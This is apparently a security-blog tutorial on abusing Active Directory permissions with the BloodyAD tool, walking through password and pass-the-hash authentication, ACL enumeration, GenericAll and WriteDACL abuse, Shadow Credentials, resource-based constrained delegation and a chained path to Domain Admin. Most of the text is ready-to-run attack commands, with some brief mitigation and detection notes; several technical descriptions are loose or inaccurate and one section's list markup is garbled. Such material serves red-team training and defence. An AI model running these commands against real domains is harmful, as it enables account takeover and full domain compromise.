Active Directory Pentesting with BloodyAD: Master DACL Abuse & Privilege Escalation + Video

Listen to this Post

Featured Image

Introduction

Active Directory (AD) remains the primary authentication and authorization hub for enterprise Windows networks, making it a prime target for red teams and attackers. BloodyAD is a powerful Python-based exploitation tool that abuses AD permissions—specifically Discretionary Access Control Lists (DACLs)—to perform privilege escalation, persistence, and full domain compromise through techniques like GenericAll, WriteDACL, and Resource-Based Constrained Delegation (RBCD). This article provides a hands-on guide to setting up BloodyAD, authenticating with passwords or Kerberos tickets, and executing common AD attack paths to elevate privileges to Domain Admin.

Learning Objectives

  • Objective 1: Understand how BloodyAD interacts with LDAP and SMB protocols to abuse DACL misconfigurations in Active Directory.
  • Objective 2: Execute privilege escalation attacks including adding users to privileged groups, resetting passwords, and performing Shadow Credentials attacks.
  • Objective 3: Implement post-exploitation techniques like RBCD and WriteOwner abuse to gain persistent Domain Admin access.

You Should Know

1. Setting Up BloodyAD and Authentication Methods

BloodyAD requires Python 3.9+ and several dependencies. It communicates via LDAP(S) and SMB to modify AD objects. Below is a verified setup on Kali Linux, along with Windows-compatible authentication options.

Step‑by‑step guide:

 Clone the repository (Kali / Linux)
git clone https://github.com/CravateRouge/bloodyAD.git
cd bloodyAD
pip install -r requirements.txt
python3 setup.py install

Verify installation
bloodyAD --help

Authentication examples:

 Password authentication
bloodyAD -d lab.local -u jdoe -p 'Password123' --host 192.168.1.10

Pass-the-Hash (NTLM)
bloodyAD -d lab.local -u jdoe --hash 'aad3c435b514a4eeaad3b935b51304fe' --host 192.168.1.10

Kerberos authentication (after obtaining a ticket)
bloodyAD -d lab.local -u jdoe -k --host dc.lab.local

Windows alternative: Run BloodyAD via WSL2 or a Python virtual environment. For native Windows, use PowerView (PowerShell) but BloodyAD is preferred for Linux-based red team infrastructure.

2. Enumerating AD Objects and DACLs with BloodyAD

Before exploitation, enumerate users, groups, computers, and their ACLs to identify privilege escalation paths. BloodyAD provides dedicated enumeration modules.

Step‑by‑step guide:

 List all domain users
bloodyAD --host 192.168.1.10 -d lab.local -u 'lowpriv' -p 'Pass123' get object --type user

List domain groups
bloodyAD --host 192.168.1.10 -d lab.local -u 'lowpriv' -p 'Pass123' get object --type group

Get detailed DACL for a specific object (e.g., Domain Admins group)
bloodyAD --host 192.168.1.10 -d lab.local -u 'lowpriv' -p 'Pass123' get object 'CN=Domain Admins,CN=Users,DC=lab,DC=local' --raw

Find interesting ACEs (Access Control Entries) for current user
bloodyAD --host 192.168.1.10 -d lab.local -u 'lowpriv' -p 'Pass123' get user --aces

Pro tip: Combine BloodyAD with BloodHound output. Use `bloodyAD` to verify and exploit paths identified by BloodHound’s SharpHound collector.

  1. GenericAll / GenericWrite Abuse – Adding Users to Privileged Groups

If a user has `GenericAll` or `GenericWrite` permissions over a group (e.g., Domain Admins) or another user, they can modify group membership or reset passwords. This is a classic privilege escalation vector.

Step‑by‑step guide:

 Assuming 'attacker' has GenericAll over 'Domain Admins' group
 Add current user (lowpriv) to Domain Admins
bloodyAD --host 192.168.1.10 -d lab.local -u 'attacker' -p 'AttackerPass' add groupmember 'CN=Domain Admins,CN=Users,DC=lab,DC=local' 'CN=lowpriv,CN=Users,DC=lab,DC=local'

Verify membership
bloodyAD --host 192.168.1.10 -d lab.local -u 'lowpriv' -p 'Pass123' get object 'CN=Domain Admins,CN=Users,DC=lab,DC=local'

If GenericAll over a user (e.g., admin), reset their password
bloodyAD --host 192.168.1.10 -d lab.local -u 'attacker' -p 'AttackerPass' set password 'CN=Administrator,CN=Users,DC=lab,DC=local' 'NewPass123!'

Mitigation: Regularly audit privileged groups’ ACLs using tools like `Get-ACL` in PowerShell or BloodHound’s “Outbound Object Control” analysis.

  1. WriteDACL & WriteOwner Exploitation – Taking Control of Objects

WriteDACL allows a principal to modify an object’s DACL, effectively granting themselves any permission. WriteOwner allows changing the object’s owner, which also provides full control. These are high-impact misconfigurations.

Step‑by‑step guide:

 Exploit WriteDACL over Domain Admin group
 First, grant yourself GenericAll on the target group
bloodyAD --host 192.168.1.10 -d lab.local -u 'attacker' -p 'AttackerPass' add genericAll 'CN=Domain Admins,CN=Users,DC=lab,DC=local' 'CN=attacker,CN=Users,DC=lab,DC=local'

Then add yourself as member (same as section 3)
bloodyAD --host 192.168.1.10 -d lab.local -u 'attacker' -p 'AttackerPass' add groupmember 'CN=Domain Admins,CN=Users,DC=lab,DC=local' 'CN=attacker,CN=Users,DC=lab,DC=local'

Exploit WriteOwner over a computer object (for RBCD)
bloodyAD --host 192.168.1.10 -d lab.local -u 'attacker' -p 'AttackerPass' set owner 'CN=WEB01,CN=Computers,DC=lab,DC=local' 'CN=attacker,CN=Users,DC=lab,DC=local'

Now you have full control – grant RBCD rights
bloodyAD --host 192.168.1.10 -d lab.local -u 'attacker' -p 'AttackerPass' add rbcd 'CN=WEB01,CN=Computers,DC=lab,DC=local' 'CN=attacker,CN=Users,DC=lab,DC=local'

Verification on Windows (PowerShell):

 Check DACL for an object (run as domain admin)
(Get-Acl "AD:\CN=Domain Admins,CN=Users,DC=lab,DC=local").Access | Format-Table IdentityReference, ActiveDirectoryRights

5. Shadow Credentials Attack – Key Credential Roasting

The Shadow Credentials attack (a variation of Kerberos roasting) abuses the ability to add a key credential (public key) to a user or computer object, allowing the attacker to authenticate as that object using PKINIT. BloodyAD automates this.

Step‑by‑step guide:

 Generate a self-signed certificate and add it as Shadow Credential to a target user (e.g., admin)
bloodyAD --host 192.168.1.10 -d lab.local -u 'attacker' -p 'AttackerPass' add shadowcredential 'CN=Administrator,CN=Users,DC=lab,DC=local'

The tool outputs a PFX file and a hash. Use the hash to obtain a TGT via PKINIT
python3 /opt/PKINITtools/gettgtpkinit.py -cert-pfx 'administrator.pfx' -pfx-pass 'password' lab.local/administrator administrator.ccache

Now use the TGT to impersonate the admin
export KRB5CCNAME=administrator.ccache
bloodyAD --host dc.lab.local -d lab.local -k get object 'CN=Domain Admins,CN=Users,DC=lab,DC=local'

Detection: Monitor Event ID 4624 (successful logon) with Logon Process = `Kerberos` and Authentication Package = Kerberos, combined with unusual certificate usage (Event ID 4768, 4769). Also watch for modifications to `msDS-KeyCredentialLink` attribute.

6. Resource-Based Constrained Delegation (RBCD) Exploitation

RBCD allows a computer to delegate its service tickets to any principal. If an attacker has write access to a computer object (e.g., via WriteOwner or GenericAll), they can configure RBCD to impersonate any user (including Domain Admin) to that computer.

Step‑by‑step guide:

 Assume attacker controls a computer (or has WriteOwner on a high-value computer like DC)
 Add RBCD rights from attacker-controlled machine 'ATTACKPC$' to target 'DC01$'
bloodyAD --host 192.168.1.10 -d lab.local -u 'attacker' -p 'AttackerPass' add rbcd 'CN=DC01,CN=Computers,DC=lab,DC=local' 'CN=ATTACKPC,CN=Computers,DC=lab,DC=local'

Now request a TGS for Domain Admin to DC01 using attacker's machine account
python3 /opt/impacket/examples/getST.py -spn 'cifs/dc01.lab.local' -impersonate Administrator -dc-ip 192.168.1.10 lab.local/ATTACKPC$ -hashes ':aad3c435b514a4eeaad3b935b51304fe'

Use the ticket to access DC01
export KRB5CCNAME=Administrator.ccache
python3 /opt/impacket/examples/wmiexec.py -k -no-pass dc01.lab.local

Mitigation: Set `msDS-AllowedToActOnBehalfOfOtherIdentity` to null on high-value computers. Use the `Protected Users` group and enable Credential Guard.

7. Full Domain Compromise – Chaining Techniques

A realistic attack chain: Initial foothold → Enumerate with BloodyAD → Identify WriteDACL on a user → Reset that user’s password → User has GenericAll on Domain Admins → Add yourself → Full control.

Step‑by‑step guide (complete automation example):

 1. Authenticate as low-priv user
bloodyAD --host 192.168.1.10 -d lab.local -u 'jdoe' -p 'Winter2024' get user --aces > aces.txt

<ol>
<li>Find that jdoe has ResetPassword on svc_backup</li>
<li>Reset svc_backup password
bloodyAD --host 192.168.1.10 -d lab.local -u 'jdoe' -p 'Winter2024' set password 'CN=svc_backup,CN=Users,DC=lab,DC=local' 'NewPass123!'</p></li>
<li><p>Authenticate as svc_backup
bloodyAD --host 192.168.1.10 -d lab.local -u 'svc_backup' -p 'NewPass123!' get object --type group</p></li>
<li><p>svc_backup has GenericAll on Domain Admins – add jdoe
bloodyAD --host 192.168.1.10 -d lab.local -u 'svc_backup' -p 'NewPass123!' add groupmember 'CN=Domain Admins,CN=Users,DC=lab,DC=local' 'CN=jdoe,CN=Users,DC=lab,DC=local'</p></li>
<li><p>jdoe is now Domain Admin
bloodyAD --host 192.168.1.10 -d lab.local -u 'jdoe' -p 'Winter2024' get object 'CN=Domain Admins,CN=Users,DC=lab,DC=local' --raw | grep member

Windows defensive commands:

 Find all users with ResetPassword privileges over others (PowerShell)
Get-ADObject -LDAPFilter "(objectClass=user)" | ForEach-Object { $acl = Get-Acl "AD:\$($<em>.DistinguishedName)"; $acl.Access | Where-Object { $</em>.ActiveDirectoryRights -like "ResetPassword" } }

What Undercode Say

  • Key Takeaway 1: BloodyAD is an indispensable tool for red teams, offering a unified CLI to exploit AD ACL misconfigurations without needing multiple scripts (e.g., PowerView, SharpHound abuse).
  • Key Takeaway 2: The most critical misconfigurations are GenericAll/WriteDACL over privileged groups and users – these often stem from legacy delegation settings or improper admin segmentation.

Analysis: Active Directory’s DACL model, while flexible, becomes a liability when over-permissive ACEs accumulate over years of IT operations. Attackers like those using BloodyAD rely on the fact that organizations rarely audit “who can change whom.” Modern defensive strategies must move beyond periodic BloodHound scans to real-time ACL anomaly detection (e.g., using PowerShell Event ID 5136 for LDAP modifications). Additionally, implementing tiered administration (Tier 0,1,2) and removing unnecessary delegation can prevent 90% of BloodyAD’s attack paths. For blue teams, deploying Windows Defender for Identity (formerly Azure ATP) and monitoring for unusual LDAP modifications (like adding shadow credentials) is critical. Red teams should practice chaining low-privilege DACL abuses to demonstrate real-world risk.

Prediction

As organizations migrate to hybrid AD and Entra ID (Azure AD), DACL abuse will expand to cloud-native permissions like Azure RBAC and Microsoft Graph API scopes. BloodyAD will likely evolve into a cross-platform tool targeting both on-prem AD and Entra ID, with attacks like “Shadow Credentials” morphing into federated identity compromise (e.g., adding rogue SAML signing certificates). By 2027, automated red team tools will integrate LLM-driven ACL analysis to suggest exploitation chains in real time, forcing defenders to adopt zero-trust principles for directory services – including just-in-time admin access and continuous ACL validation.

▶️ Related Video (86% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Nishaasharmaa Active – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky